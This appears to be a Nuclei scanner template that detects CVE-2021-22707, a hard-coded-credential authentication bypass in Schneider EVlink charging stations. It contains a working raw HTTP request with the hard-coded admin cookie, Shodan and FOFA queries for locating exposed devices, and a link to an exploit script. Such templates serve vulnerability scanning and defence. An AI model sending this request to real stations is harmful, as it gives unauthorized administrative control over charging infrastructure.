41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
|
id: CVE-2021-22707
|
||
|
|
||
|
info:
|
||
|
name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
|
||
|
author: ritikchaddha,dorkerdevil
|
||
|
severity: critical
|
||
|
description: |
|
||
|
A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
|
||
|
reference:
|
||
|
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
|
||
|
classification:
|
||
|
cve-id: CVE-2021-22707
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
shodan-query: title:"EVSE web interface"
|
||
|
fofa-query: title="EVSE web interface"
|
||
|
tags: cve,cve2021,evlink,auth-bypass
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
|
Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
|
||
|
|
||
|
host-redirects: true
|
||
|
max-redirects: 2
|
||
|
cookie-reuse: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- '?worker=Cluster" name="cluster" id="id_cluster'
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|